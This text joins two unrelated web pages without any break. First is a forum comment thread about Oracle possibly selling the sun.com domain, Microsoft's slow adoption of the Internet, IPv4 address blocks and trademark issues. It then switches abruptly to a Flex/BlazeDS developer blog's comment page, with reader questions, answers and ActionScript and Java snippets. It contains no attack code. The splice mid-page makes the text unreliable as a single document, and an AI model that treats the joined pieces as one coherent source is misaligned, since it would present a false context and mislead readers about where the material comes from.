No. Bill Gates' first book, "The Road Ahead" published in 1995, famously did not refer to the Internet. The much-hyped Windows 95 OS was released without a web browser (that apparently wasn't a coincidence, Jim Clark and the Netscape crew carefully timed the release of Navigator). But MS made up for lost time. They quickly struck a deal with a small company called Spyglass for rights to their browser, which became IE. They made sure that IE was a "integral" part of Windows that couldn't be de-installed,
Re: (Score:2)
Microsoft did not have TCP/IP support until well into the '90's instead attempting to 'standardize' their NetBIOS and trying to win people over with cartoon-like chat programs and 'channels' or 'folders' instead of websites into their own Microsoft Network (MSN) which was not connected to the Internet. Thankfully the industry ignored them and MS has since been trailing in the adoption of the proper Internet in general.
Re: (Score:2)
Microsoft did not have TCP/IP support until well into the '90's
Winsock.dll was part of the standard Win 3.1 install. It's just that MS didn't advertise it, the same way the standard C/C++ libraries come bundled with today's Visual Studio but MS documentation points the reader towards .NET and C#.
Re: (Score:2)
Try again. You may have gotten Trumpet Winsock as part of your OEM install, but it was *not* part of the Microsoft standard install. Microsoft did not have a generally available TCP/IP stack shipped standard until Windows 95.
Bill Gates and the CD-ROM revolution (Score:3)
Bill Gates's book "The Road Ahead", is, in its first 1995 edition, focused on how the CD-ROM was going to change everything about computers. Remember Encarta? They were really focused on that -- multimedia on discs, that was going to be the future.
But then, for the 1996 printing, the whole thing was re-written and suddenly CD-ROMs weren't the hot thing. It was all about the Internet.
Re: (Score:2)
Ya, encyclopedias on CD were "the future"... in 1990.
My school had a Mac with a CD-ROM, and a copy of the Grolier (I think) encyclopedia. It was the most amazing thing at the time.
Re: (Score:2)
and suddenly CD-ROMs weren't the hot thing
I used to have a clipping on my cubicle wall from a Time magazine in 1995 where Bill Gates was dismissing the Internet as a fad. Despite the book's change, Microsoft never really 'got' the Internet. Sure, they had some de-facto monopoly power in it, with IE6 and such, but every strategy was how to wrap Windows in the Internet.
It was then that a couple guys were getting fed up with Altavista (OK, we all were, but they decided to do something better).
Re: (Score:1)
Interesting that Microsoft, established in 1975, doesn't appear on the list of the 100 oldest dotcom registrations. Xerox registered before IBM. Boeing before Adobe.
Of course Boeing registered early. Do you know a major focus of why the Internet was intended? As a communication system in the event of nuclear war. That's why it was sponsored by DARPA. And so a major defense contractor like Boeing got involved because well, government money!
Besides, Microsoft was not huge in 1975, or for years afterward. The idea that it was formed like Athena from the brow of Zeus is not true.
And Microsoft isn't on the list. Did they not recognise the long-term importance of the internet?
It took over 2 decades for the internet to reach any kind of building importance even in
Re: (Score:2)
Back in the day, if you asked someone what their email address is, you'd get various takes on a blank/concerned/weirded out stare. So, yeah, Internet was available, but by no means mainstream.
Re: (Score:2)
I'll be completely honest, I thought the Internet would be a fad.
Then one day all of the terminals in the library, that were setup for DISCUS, were taken except this one ratty looking box in the corner. Gopher? Veronica? OK. Man, I was hooked and felt like a complete ass for dismissing friends who had only a few years earlier been doing the BBS thing as wasting their time with a rich kid's toy that no one would be interested in.
Re: (Score:2)
Well, no, they didn't. Until it got forced down his throat, Bill G. was convinced that the Internet was a sideshow. You were going to do all your networking on Microsoft proprietary nets, you see.
Whoopee! (Score:5, Funny)
Re: (Score:2)
At $47500 per CPU, you're looking at way more than a million before you reach 32 cores.
Forget the domain, ask about the IP blocks (Score:3)
As the TLDs expand, the value of a ".com", even a sexy three letter one with some history decreases.
Ask instead which (pre CIDR) address block(s) Sun had and Larry E now has. IIRC, they're sitting on at least one "A" and potentially multiple "B"s.
Since "IPv4" is gonna implode this year (yeah, right, but just go with it.....), the IP space is gonna have much more real value.
Red
Re: (Score:2)
As the TLDs expand, the value of a ".com", even a sexy three letter one with some history decreases.
I agree with you on the IP addresses, but how much of your browsing is really done on sites with extensions other than
.com or your local ccTLD? There are some occasional exceptions, of course - I'm aware we're posting on a .org, for instance, and bit.ly springs to mind - but when was the last time you saw a legitimate site on a .biz or .info name? Even if the alternate domains do eventually gain a bit more acceptance, decent sounding .com names will have the cachet that comes with exclusivity; more so, if
Re: (Score:2)
It can be used as a verb or a noun, with one of the accepted definitions of the latter being a synonym for alternative [reference.com].
Re: (Score:2)
The IPv6 address space is exponentially bigger than IPv4 (obviously), but any successful domain in a separated Internet would only have to be "better" (in a capitalist sense, which assumes you can buy IPs) than one of the 2^32-1 addresses.
How often do you type IPs? Domain names get x^
Re: (Score:2)
Agree that IPv4 exhaustion is gonna happen and that transition to v6 is inevitable, timing uncertain.
Post transition, there will be (by design) no address shortage and legacy v4 addresses might have some sentimental value, but will really just be part of the larger space.
How smoothly transition goes, i.e., how much of the IP world gets stuck in v4 land because their OS or software vendor didn't update their stacks or applications to support v6 will also greatly influence the value of v4 space DURING transition.
Immedia
Why should they? (Score:2)
I am sure, they keep it as a redirect. for sure in-links are mentioned in old documentation, for which customers may hold the new owner responsible (in the sense of the next buying decision). It makes a very bad impression if you follow a support instruction and end up on a webpage which does not exist (or worse: was sold and re-sold to a porn company).
Re: (Score:2)
... It makes a very bad impression if you follow a support instruction and end up on a webpage which does not exist
...
Never mind, it is common on oracle.com anyway.
Jave EE XML Descriptors (Score:2)
If the domain changes hands, that's going to break a lot of XML files containing xsi:schemaLocation attributes and DTD references pointing to documents within [sun.com] .
It would probably be cheaper... (Score:2)
What about the trademark? (Score:2)
I assume the domain name is useless as long as Oracle owns the trademark to "Sun".
angel'o'sphere
Really not that simple... (Score:2)
Destroying the brand? (Score:2)
Re: (Score:2)
Larry WANTS to destroy the brand.
There's little doubt this is irrational control-freakery from the largest shareholder.
They won't sell (Score:2)
Reason: redirects.
Thread over, move along.
PS: And they don't need the money, want to keep the namespace of Java functions etc etc etc etc etc. Why did this make frontpage?
I'm not sure they'd sell it... (Score:2)
They may be decommissioning it, but that doesn't mean they're going to sell it. There are plenty of domains held by companies which they just hold for the purpose of making sure they have the domains matching their trademarks.
I'm not sure what the point in decommissioning it is, tbh. They may as well just make it point to the root Oracle homepage and forget about it.
Re:Re (Score:5, Funny)
Oracle.xxx would actually make a lot of sense. Considering that their prices and policies are so obscene.
Re: (Score:2)
There's a limit to how much material you can admit to being obscene before the tabloids get interested.
Re: (Score:1)
So if they sold the domain but kept the rights to the Sun name as a trademark, then how could anyone open up a new Sun.com without being in danger of violating Oracle's trademark? People have been sued over their domains named after themselves when it has the same name as a trademark, even when their domain has nothing to do with whatever area the trademark is in.
If the company operates in an entirely different area from Sun Microsystems, such that no confusion could arise, or if Oracle abandons the Sun trademark, which they probably would be if they sold Sun.com, then there's no problem.
WRT lawsuits, the CIA has also been sued for mind control. You can sue for anything; winning is the hard part.
Re: (Score:1)
semi o/t, but this site might interest you [nissan.com]
The gent has the same last name as a big car company. Sort of bad luck for him. He still has his domain, but out of pocket for lawyers...
Re: (Score:2)
Yeah, but being sued is both time consuming and expensive.
Re: (Score:2)
Duh! That's how Oracle intends to make the really big bucks.
Re:Worth more to keep it (Score:5, Informative)
Re: (Score:2)
There is probably tons of software that points at sun.com, automatically downloading software...
Oh God, it's like a black hat's wet dream. Thousands of machines requesting binaries from your server every second and then blinding running them.
On a more seriously note, sun.com is already gone, but my Java updates are still working fine, so I'd assume their update server isn't located at sun.com. Not to mention Java updates are probably cryptographically signed.
There's LOTS more than web servers on a domain. (Score:2)
There is probably tons of software that points at sun.com, automatically downloading software, docs, etc.
There's lot of other stuff, too.
Like @sun.com mail addresses, just for starters.
Re: (Score:2)
Like @sun.com mail addresses, just for starters.
Those were decommissioned about a year ago.
(Oddly enough, my @mysql.com address still works.)
Re:I would use it to be Frist Post! (Score:4, Informative)
Having a domain like SUN.com! Just think of the internet street cred!
Yo dog! I'm at owner@sun.com!
And what would you do with sun.com? Start some sort of internet busin&@!%&*#%OHFUCK I already have a cease and desist letter from Oracle saying they still own the trademark 'Sun' in relation to all computer everything. Your best bet it so open Sun Bakery and sell cook#@&$*!DAMNIT! Cookies are computer related too.
Ok--here's the plan: Step 1: Buy sun.com for millions Step 2: Find out you can't start a computer company named 'Sun' or Oracle will sue you into oblivion. Step 3: Kill yourself because you are millions in debt with a worthless domain name.
On this page we can discuss topics which I have not blogged about. 🙂 Trying to fix ASAP.
Thank you.
:)
Hi Sujith,
I am new to the Flex and ActionScript world; I am basically a Java programmer. I have read about Flex to some extent and used the examples on the Adobe sites. I have tried BlazeDS as well. Though I was able to run the example in the tutorial, it was a rather simple example. I am trying to map a complex Java object (an object that has more objects inside it, and those objects have some objects, and so on, to a certain level) to ActionScript objects. How can I map such complex types to ActionScript objects? Can you please provide me with a working example if possible.
Your help will be greatly appreciated
-Chandu
Hi Chandu,
Let's say you have an object Student which contains properties named Address, Courses and Profile. All three properties are objects of their respective class types. When you pass an object of type Student to the Flex application, it will contain objects of type Address, Courses and Profile, right? In order to get all these objects mapped to your AS objects, all you have to do is create AS objects of type Address, Courses and Profile and map them to the respective Java classes individually. This applies even if you are passing the objects in an ArrayList from Java; you will receive them as an ArrayCollection, with the objects converted into mapped AS objects 🙂
Hope this helps. If not, let me know and I will try to give you a sample 🙂
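For illustration, a minimal sketch of the kind of nested Java value object being discussed (all class and property names here are hypothetical); each nested type would get its own ActionScript class mapped to the corresponding Java class:

// Hypothetical server-side value object for the Student example above.
public class Student implements java.io.Serializable {

    private Address address;
    private Courses courses;
    private Profile profile;

    public Address getAddress() { return address; }
    public void setAddress(Address address) { this.address = address; }

    public Courses getCourses() { return courses; }
    public void setCourses(Courses courses) { this.courses = courses; }

    public Profile getProfile() { return profile; }
    public void setProfile(Profile profile) { this.profile = profile; }
}

// Stub nested types; in a real application each would be a bean-style
// class with its own properties and a matching AS class.
class Address implements java.io.Serializable { }
class Courses implements java.io.Serializable { }
class Profile implements java.io.Serializable { }

On the Flex side, the matching ActionScript class would carry a [RemoteClass(alias="com.example.Student")] style annotation, and likewise for each nested type.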
Hi Sujith,
Thanks for your prompt reply. I will try out your suggestions. But if you can provide me a sample if you get time, that will be great too.
Thanks a Lot again.
-Chandu
Hi Sujith,
Can you please provide an example, say something like you mentioned: a list of Students. I want to be able to have a page display a list of students with their names, the courses they are taking, etc., but this data should be retrieved from the Java class.
In this scenario, where does the ActionScript fit? I mean, my understanding is:
1) I will create a Flex app, i.e. an MXML file, which will invoke the Java class like you described in one of your blog posts. But now, to interpret the complex object type returned by the Java class, I need ActionScript objects to map to the Java objects…
2) I will also write the Java class and put the classes in the WEB-INF folder etc.
3) I will click a button to get the data from the page.
In the above scenario:
a) where exactly will I need to create the .as file mapping,
b) which folder should the .as file reside in,
c) how will the client Flex app know to render the data in a grid, table or text area etc.?
The above are some areas where I am still in the dark.
Your help will be greatly appreciated
Regards
-Chandu
Hello sujith,
I’m sharath, i think u remember today only i’m requesting u at the end of the elimination round in Hyderabad Boot Camp.Anyway things went wrong i didn’t had a chance to participate in the next round…Ok i have asked you the question about database but still i had a problem in connecting to it…Ok Let me ask this one I’m developing a Cricket Score analysis application using charts i succeded up to some extent…Actually my plan was to implement it in BootCamp..I completed most of the coding part but my problem is when i take the score for a team i’m using a ArrayCollection for both the teams…It sounds good for only one match score but i want to create a generic application where i want to take the match scores from the users what ever they like and store it in database.Can you please help me reagarding this one and onemore thing i’m a asp.net user.If u can provide me some code snippets it will be help ful to me.If you want i will send my application code..Please give me your Mail address. Thankyou…
Hi, I created a blog for myself on WordPress. In it I posted my application. I want to enhance that application using .ASPX. How do I do that? Please help.
Hi Sujith,
I am trying to use Flex with a WebLogic (8.1.5) portal application. When I use HTTPService to make a call to the server, it returns the contents from the server, but it invalidates the existing session. I am not able to access any other portlets.
When I use a remote object call, it gives me an SSL handshake error.
How do I resolve this? Please help me out.
Hi Sharath,
Application looks great. You have to use some server side script to connect to the database from a Flex application. You have three options to interact with the database. You can create a .ASP page which will listen to your request and do the database operations. You can also expose the .NET functions as web services and access them from the Flex application. If you are looking for a RPC kind of solution, where in you want to invoke the functions in the .NET object from your Flex application, you can try WebORB. Below is the URL to the weborb site. You can even find code samples for all the above options i.e. web service/http service/RPC
Hope this helps.
Hi Chandu,
Your question was on how to map AS objects to Java objects. I have created a post on this, check this post on my blogs: mapping-action-script-objects-to-java-objects
Your AS class should reside in your Flex application and the mapping to the Java class is done in the AS class.
Rendering the data in a datagrid is a completely different problem. If you want to populate a datagrid with the ArrayCollection, you can use the dataProvider property of the datagrid. In the case of a text input or anything else, you have to retrieve the value from the object (returned by Java) and then set it to the appropriate property of the component. Please refer to the language reference of the respective components for details.
Hope this helps.
Thank you for your reply, Sujit. I'll try to use WebORB. I want to see those applications of the Hyderabad Boot Camp winners; can you please post them…
Hi Sujith,
Thanks for the reply. In fact I was able to overcome the AS mapping with Java. Now I am trying to dynamically create a DataGrid using script and populate it with data from the Java remote object, but it doesn't work. I have pasted the MXML code; do you think it is the right way of doing things?
Please help.
Regards
-Chandu
////////////////////////////
<![CDATA[
import mx.events.FlexEvent;
import mx.rpc.events.ResultEvent;
import mx.binding.utils.BindingUtils;
import mx.collections.ArrayCollection;
import mx.controls.DataGrid;
import mx.controls.dataGridClasses.DataGridColumn;
import mx.containers.Panel;
import mx.controls.listClasses.ListBase;
import mx.rpc.remoting.mxml.RemoteObject;
// A data provider created by using ActionScript
//[//Bindable]
//private var employeeList:ArrayCollection ;
[Bindable]
private var ro1:RemoteObject = new RemoteObject("prctest");
//employeeList=ro.getEmployeeList1() as ArrayCollection;
[Bindable]
private var dg:DataGrid = new DataGrid;
[Bindable]
private var pn:Panel = new Panel;
[Bindable]
private var dgc:DataGridColumn;
private function buildDG():void
{
var aColumnDef:Array = getColumnDefArray(); //returns a noraml array of objects that specify DtaGridColumn properties
var oColumnDef:Object;
var aColumnsNew:Array = dg.columns
var iTotalDGWidth:int = 0;
for (var i:int=0;i<aColumnDef.length;i++) { //loop over the column definition array
oColumnDef = aColumnDef[i];
dgc = new DataGridColumn(); //instantiate a new DataGridColumn
dgc.dataField = oColumnDef.dataField;
dgc.headerText = oColumnDef.headerText; //start setting the properties from the column def array
dgc.width = 100;
// iTotalDGWidth += dgc.width; //add up the column widths
// dgc.editable = oColumnDef.editable;
//dgc.sortable = oColumnDef.sortable
dgc.visible = true;
//dgc.wordWrap = oColumnDef.wordWrap;
aColumnsNew.push(dgc) //push the new dataGridColumn onto the array
}
dg.id = "list";
dg.columns = aColumnsNew; //assign the array back to the dataGrid
dg.editable = false;
dg.width = 400;
//dp.dataProvider=;
dg.dataProvider = ro1.getEmployeeList1.lastResult; //set the dataProvider
this.pn.addChild(dg);
this.addChild(pn);
}
//uses the first product node to define the columns
private function getColumnDefArray():Array
{
//Alert.show(“colcount:” + xmlCatalog.toXMLString());
var aColumns:Array = new Array();
var oColumnDef:Object;
var empName:EmployeeName;
// for (var i:int=0;i
////////////////////////////
Hi Sujith,
How can I create a dynamic DataGrid and populate it with data from a Java-invoked remote object? In the code I pasted above, I was able to create the grid, but when I provide it with the dataProvider I get an error and it does not work. Can you please help me?
– Regards
-Chandu
Hi Chandu,
[Small correction]
Please try changing this line
ro1.getEmployeeList1.lastResult
to
ro1.getEmployeeList1.lastResult as ArrayCollection
and also make sure the getEmployeeList1() method is invoked. 🙂
Hope this helps.
Hi Sharath,
I will post the applications developed at the Flex Boot Camp in Hyderabad as soon as possible. We have requested the KMIT college staff to burn a CD and send it to us 🙂
Hi Sujit,
I’m playing around flex and blazeds for a while now and still pretty confused at it. I found your tutorials easy to follow but i still have a question.
I can now send and receive messages through topics and using JMS-adapter. But my problem is the authentication of users, can i authenticate users through topics? can you help/guide me on login/authentication part? i don’t know what approach i will do to make this.
It seems that the returned data in this case must be processed asynchronously via a result listener. Try the following to see if it works for you:
private var ro1:RemoteObject = new RemoteObject("prctest");
ro1.getEmployeeList1.addEventListener("result", buildDG);
ro1.getEmployeeList1();
private function buildDG(event:ResultEvent):void {
//build your DG here….
dg.dataProvider = event.result;
}
Note that event.result seems to exist only in the event handler, so you won't be able to assign it to a shared variable and use it in a different function.
Hi Sujit
We need some help. We have a Java Applet that captures images on a users desktop. How can we convert the image from a byte array to string to pass to FLEX. Is there a better way to pass the images from the Applet to Flex?
Any ideas would be greatly appreciated. Also do you have time for any consulting on a project??
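One common approach (a sketch, not something from the original exchange): Base64-encode the bytes on the Java side and decode them in Flex. java.util.Base64 requires Java 8+; an applet on an older JRE would need a library such as Apache Commons Codec instead.

import java.util.Base64;

public class ImageBridge {

    // Encodes captured image bytes as a Base64 string, which can be
    // handed to the Flex side (for example via JavaScript and
    // ExternalInterface) and decoded back into a ByteArray there.
    public static String encodeImage(byte[] imageBytes) {
        return Base64.getEncoder().encodeToString(imageBytes);
    }
}

On the Flex side, mx.utils.Base64Decoder can turn the string back into a ByteArray, which Loader.loadBytes() can then display.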
Hi Sujit,
What a lovely blog!! So useful for us.
I’m Praveena. We’ve a plan to develop one financial portal. I’m just thinking of using technologies like JBoss portal, Adobe Flex, BlazeDS.
Can you please give an overview of how I can achieve this? Or where can I get an architecture using the three technologies? Can I use the Eclipse IDE for development?
Please let me know.
Thank you so much.
Hi Sujith
I am able to work with BlazeDS. Is it necessary that the package structures of the AS and Java classes match for mapping them?
for ex:
can I have a java object in package say com.abc.data.util
and the mapped actionscript class in package com.abc.client.flex.util
I have tried it and it's not working. I have tried looking it up in the documentation, but nowhere does it talk about the package structure being the same.
Can you please tell me if the above is true?
Regards
-Chandu
I followed the steps you gave for BlazeDS but am not able to make it work; it's giving the error "page cannot display".
Can you please tell me how to get the sample applications available in tomcat\webapps\samples working?
Hi Chandu,
The package structure of the AS class and the Java class which are mapped need NOT be same. Please check out if you are missing something else. Try checking your log files for errors 🙂
Hope this helps.
Hi Abhay,
My guesses are check if the server is running, if the server is up and running, please see if you can find any errors in the server log files. If you cannot figure out whats going wrong, please feel free to mail me with your log files.
Hope this helps.
Hi baji,
Please modify your code in the setEconVarDetails() function to the below and then try.
public function setEconVarDetails(event:ResultEvent):void
{
var a_econVars:ArrayCollection = event.result as ArrayCollection;
var econVar:CardEconVar = new CardEconVar();
econVar = a_econVars.getItemAt(0) as CardEconVar;
}
Hope this helps.
Hi
Myself, I am Srinivas, working as a senior software engineer (web, UI).
I want to learn Flex designing (CSS, themes, layouts, etc.).
Any help from your side? I am from Hyderabad.
Hi Sujith
I am using BlazeDS to send data to my Flex client. Is there an API
or a way to find out how many bytes of data the client received from the server
if I make a remoteObject call?
Basically I am trying to find out how many bytes of data are transferred over the wire through BlazeDS…
Can you please explain the blazeDS serialization and how it works.
For example: I am sending a list of HashMaps. Each HashMap is a set of key-value pairs and corresponds to one row of data in the DataGrid. The HashMap keys are column names
and the values are the cell values.
Say, for example, I am sending 3 HashMaps. Since the keys are column names, this information is duplicated as keys in all 3 HashMaps. I know that on the Java side it uses references. But once the data is serialized through BlazeDS, is that maintained or not?
Any help will be greatly appreciated.
Thanks
-Chandu
Hi Chandu,
State should be maintained; please check it out. I think the serialization works the same way as Java serialization.
Hi Sujith,
I am Hari, working in CDAC as a contract project engineer.
I am currently working on the Java/J2EE platform. I wanted to study
Flex + Java integration. Please help me by providing some good tutorials and advice…
Hari.S
-> About using different database urls with destinations in the hibernate assembler in LCDS.
Hi Sujith,
I have a question that I could not find any information about on the web. I thought this might be familiar to you. I have a Flex app which uses Data Service destinations using the Hibernate assembler. But since all the destinations (whether runtime or XML, for application scope) get loaded on startup, I am unable to change the Hibernate configuration, especially the database name, based on the user logged in.
For example. Consider a flex app with hibernate in backend.
Company XYZ should use XYZ database
Company ABC should use ABC database.
Note: Both xyz and abc have same tables or data model.
Also, changing the original Hibernate configuration (using a programmatic API like Configuration()) has no effect. Note that the Data Service destinations, once created
on server startup, cannot accept a new Hibernate configuration either; even if they could,
the same changes would apply for both XYZ and ABC users.
Any help on this would be appreciated. Thanks.
I am new to BlazeDS. I am using Flex Builder 3, MySQL and Java to develop a project. Initially I get all the records from the database through the push mechanism. If any changes are made, I send the whole record set again. Can you please guide me on how to use the push mechanism with a MySQL database and BlazeDS?
Thanks
Hi there,
I have set up some 'destinations' in BlazeDS, and am successfully using Producers/Consumers from my Flex application to connect to these destinations and exchange messages.
Now, since my server is hosted, anyone in the world who knows the destination name can connect to this BlazeDS destination of mine (from a simple Flex app) and send/receive messages. Isn't this true? How do I prevent unauthorized access?
Looking forward to your help!
Hi Hari,
I mailed you the list of URLs.
Hope that helped
Hi Jasper,
I mailed you details on securing destinations.
Hope that helped.
Hi Sujit,
Recently I have been working on a project that needs to read an XML file and display the content in a DataGrid layout.
Could you please tell me how to do it?
If you have the answer, please forward it to my mail.
Thanks
Srinu
Hi Sujit,
I’m Crystal. I’m new to Flex and BlazeDS technology. So far all the implementation is alright. But I have some questions about the Messaging Service. Hope you can answer me or provide some useful links to me or give me some examples.
Let's say there are two different servers. A JMS client (producer) resides on Server A, and a Flex client (consumer) resides on Server B. JMS is going to publish some data to a BlazeDS destination and allow Flex to subscribe to it. The questions are:
a) The main question: on which server should the BlazeDS destination reside?
b) Can the BlazeDS destination reside on Server A? If yes, how is the Flex client going to subscribe to the data on a different server? Any ideas and examples?
c) Is it a must that the BlazeDS destination reside on Server B? If so, any idea/example that enables JMS to publish the data to a different server?
Looking forward to your help. Thank you and advanced.
=Crystal=
Oh ya, I also need some details about destination security from you. Thanks for your help again.
=Crystal=
Hi Crystal,
I Emailed details to your yahoo inbox.
Hope that helped.
Hi Srinu,
Please find code samples at the URL below.
Hope this helps 🙂
Hi Sujit,
Thanks for your information.
May I request some websites/links related to the idea you gave me?
Thanks again.
Regards,
Crystal
Hi Sujit,
It’s me again. I really need some advise from you.
Nowadays, "performance" is becoming an important issue, especially when developing a real-time application.
I went for BlazeDS Messaging because of this as well.
I wonder how fast/good the performance is when millions of records are pushed to the client side.
Does the performance actually depend on the network protocol?
E.g. BlazeDS offers long polling and streaming. Is "streaming" faster than "polling"?
LCDS (the commercial product) offers RTMP and a socket-based protocol. So will "RTMP" be faster than the "streaming" offered by BlazeDS?
To conclude: is LCDS Messaging better than BlazeDS Messaging when you want to develop a mission-critical real-time application?
Looking forward to your help. Thank you.
Hi, I want to create an app using Flex and Java, but the thing is I cannot move to another page after clicking the logout button. Please tell me how to do page navigation.
Hi Kesh,
Please have a look at view states in Flex. There is nothing like a page in Flex; you will have to think in terms of states, or keep adding and removing components in a single state.
Please find more details on view states at the URL below.
Hope this helps.
Hi Sujit,
Can you apply the content in your blog post about Flex Message Service with BlazeDS to AIR apps? I only have access to a PHP backend and so have been trying with Weborb to no avail.
cheers
Hi Sujit,
I am not able to zoom the chart in Flex for trending.
Can you please provide examples?
Thanks in advance..
Whoops – apologies for that double entry there!
I found this post “” by Christophe which explains that you must specify the actual server address & port in the services-config.xml file rather than leaving the ‘tokens’ in place to use DS with AIR apps.
He says:
“instead of:
use: ”
I’m using BlazeDS on port 8400 and found this worked:
And similar for Weborb except on port 80.
changed this:
“weborb.php”
to this:
“”
Also of worthy note, I had to ‘clean’ my projects in Eclipse after making a change to the service-config.xml file before the change was reflected.
Now down to securing the channels…
Hi Kev,
Yes, you got it right. In case of AIR application you need to give the complete URL 🙂 and yes, you have to clean your project in Flex Builder.
Feel free to ping me if you think I can help you 🙂
Hi Sujit,
Thanks for your reply and for this great site 🙂
I notice that you sent some information to another person regarding securing AMF channels – could you please forward to me also?
I have read that the simplest way is to create a local user list to which you allow certain channels access. But I was wondering how hard it would be to query a database on the server for a list of users?
(runtime channel creation is very useful too – thanks)
cheers!
Hi Sujit,
I am new to Flex and using the Flex Dashboard sample given at
I need to use my existing applet (which does publish/subscribe with the backend) to update data in the individual pods.
Using JavaScript, I am able to call the methods inside the Dashboard main MXML. From there, I do not know how to pass the data to the individual pods.
Can you please help me with this ASAP?
Regards.
Hi Sujit – Have a question similar to the one above.
Could you look at the below link?
Appreciate your thoughts.
Thanks
Ravi
Hi Kev,
Please find more details on how to secure channels at this URL
Hope this helps. I am sorry I was stuck with work and so the delayed response 🙂
Hello all,
I am new to BlazeDS and am working on a project that requires it. I came across your article, and let me take this opportunity to tell you that you put out solid work. I am just wondering how I can do the following:
I have my back end written in Java, and in my class I have an array of Strings that keeps getting updated. In my client-side code, I invoke the getter method for this array. I would like to display those messages on the client side as soon as the server knows the array got updated.
I tried to listen and get the array data every XXXX amount of time. Unfortunately, this approach did not work. I got all the results at the very end (all at once).
Please let me know of your ideas, and if you have sample code that would be very helpful.
Thank you,
Moussa
Hey Sujit,
Thanks for the links about securing destinations. I've been busy on another project and finally have time to look at this again. I'll post my results of attempting to get this working with AMFPHP/WebORB…
cheers
hello Sujit,
I am using OS X 10.5.
I installed Flex Builder on it and it is working fine.
Now I want to display a PDF file in my AIR application.
My application has two main parts:
a list of PDF files on the left side, and the right side is empty.
When the user clicks on a PDF file, that PDF should open in the right part.
I tried it with the HTML capability but it's not working.
Is it a problem with OS X or something else?
Hi Sujit,
How do I make two SWF files communicate using the cross-scripting method?
raaja
Hi Kpbird,
Please try visiting the URL below. If you already did that and it's still not working, please send your code to sujitreddy.g@gmail.com and I will try to fix it 🙂
Hope this helps 🙂
Hi Moussa,
Remoting calls are batched. Try to send the code to sujitreddy.g@gmail.com I will try to fix it 🙂
Hi Sujit, how are you?
I am training on Adobe Flex and I am facing one problem:
a remote object using LCDS. I have been trying for two days but I am not getting it.
Please send one sample program (Java class, Flex code), and tell me how to configure it on the server. Please send me the folder structure.
I see that you have comments about modularization in Flex and articles about using RSL in Flex, so I have a request. Point me to the ‘best practices’ for using those techniques with AIR. I have an AIR ‘container’ that has lots of Flex components that are modular AND rely on the Player to cache both the Flex framework and my own libraries. How — precisely — do you make those enhancements with AIR.
No, I don’t want to be told that desktop applications don’t need to be small and compact — nonsense — no one wants to download a 5MB update if only a .5MB update is needed. How do we do this with AIR? Your thoughts would be much appreciated since you cannot find anyone in Adobe product management willing to talk about the apparent disconnect.
Hi Adireddy,
Please visit the URL below.
Hope this helps.
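For reference, the Java side of a remoting destination can be a plain class; a minimal sketch (the class and method names here are made up) that a destination in remoting-config.xml would point to through its source property:

// Hypothetical class exposed as a BlazeDS/LCDS remoting destination.
// The destination's <source> in remoting-config.xml is this class's
// fully qualified name; Flex invokes it through a RemoteObject whose
// destination matches the destination's id attribute.
package sample;

public class HelloService {

    public String sayHello(String name) {
        return "Hello, " + name + "!";
    }
}

The Flex side then sets the RemoteObject's destination to that destination id and calls sayHello() as if it were local.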
I tried your example about integrating BlazeDS with Flex and got all the way through, but the application didn't display your message; instead I got: Destination "CreatingRpc" either does not exist or the destination has no channels defined (and the application does not define any default channel).
Got any ideas?
Hi Bob,
Couple of things you can try.
1. Clean your project in Flex Builder
2. Restart your server
3. Clean the browser cache.
4. Check if the destination exists 🙂
Hope this helps.
Hi sujith,
I am new to Flex. I read your articles and I feel they were very helpful. Recently I had an interview and just want to share the questions; if anybody can answer them, that will
be helpful.
Unit testing and how did you approach it?
Explain the Cairngorm event?
Explain interfaces and abstract classes in Java with examples?
Why did you use Spring?
How will you check for authorization?
Flex issues?
Why did you use LCDS?
Hi Sujith,
I have gone through your blog post "Sending messages from Java to BlazeDS destinations using MessageBroker"… The Flex client is working fine both as producer and consumer, but the message sent from the JSP is not appearing in the Flex client… Do I need any other configuration? I am using the BlazeDS turnkey server…
Hi Sujith,
A very good site…
I need to retrieve a Java object from Flex, but I don't know how to start. Can you help me?
I've heard about LiveCycle Data Services, BlazeDS and remote objects. Are these technologies the same, or are they different?
thanks a lot
Hello –
I am a designer turned developer who is moving from Flash to Flex and I have been asked to help someone plug their site into the photoshelter api (the basic documentation for this is at:). I have some limited experience in using Amfphp to make mysql queries through Flex, but am unsure whether, or how, I can access this kind of api – and can’t find any info. that clarifies things for me. Do I need to use a solution like Blaze DS and Java, or can I manage the session calls through amfphp? Can you give me any pointers on this? Thanks.
Namaste:
Would love to have an AIR app, that displays a PDF to cover the entire desktop area (until minimized).
Would love for the live PDF to become the actual desktop canvas; but I don’t know if that is possible.
Can someone speak to this?
In Service of THE ONENESS,
Rafiki “The Digital Doctor” Cai
Hey Sujit,
This is Vishnu. Good to know you are from BITS PIlani,I’m from BITS Pilani too, passed out in 2007.
So lately I’ve been trying to learn FLEX by myself. Was trying to build a twitter mashup using Chris Korhonen’s Creating Mashups with Adobe Flex and AIR. I’m not using the Flex Builder. I compiled my mxml file and transferred the generated swf file to the root of my HTTP server. I also included a crossdomain.xml file in the root since the RSS feeds it was trying to access doesn’t reside on my server.
Despite this i keep getting an error:
[Security error accessing url” faultCode=”Channel.Security.Error” faultDetail=”Destination: DefaultHTTP”]
Here is the code:
twitter.mxml
Tweet.mxml
cross-domain.xml
Where am i going wrong here?
Hi Vishnu,
Looks like the code got truncated.
You will need the crossdomain.xml on the server from which you are accessing the data from and not on the server where the SWF file is hosted.
Hope this helps.
Hi Lord,
URLs below should help you.
Hope this helps.
Hi Jai,
I don’t think you need to worry about AMFPHP for accessing the API you mentioned. Looks like they are sending their response as XML. All you need to do is to use HTTPService component and access the XML.
Please find more details on how to use HTTPService at the URL below.
Hope this helps.
Thanks Sujit, that is a useful confirmation. However I remained rather confused about security. I have to access the photoshelter api via SSL. From what I gather, that seems to mean that I must use a proxy of some sort… Is that true? If I authenticate by sending username and password over HTTPService, don’t I make my archive at photoshelter very vulnerable?
Would it still be worth it to be running the httpService through BlazeDS? Would it make any differences to speed? Again, thank you so much for your helpful advice.
After further research, I now believe that I have to set “useProxy” to true and then configure my https service via BlazeDS – or a php proxy – in order to be able to communicate via https – and send necessary username and password authentication. (There seems to be very little clear documentation on using HTTPS with BlazeDS on the web…) So although I don’t need to use secure-amf, will it perhaps give me increased speed? Even though serialising from xml, and back into xml at the other end…
Hi Sujith,
I have developed a Flex application with web services. I would like to handle session timeouts using web services; I am not using remote objects… Could you suggest something?
I would like to know how to configure BlazeDS with WebSphere 6.0. Please reply as soon as possible.
My mail id is dinesh@visiontss.com
thanks in advance…
Hi sujit,
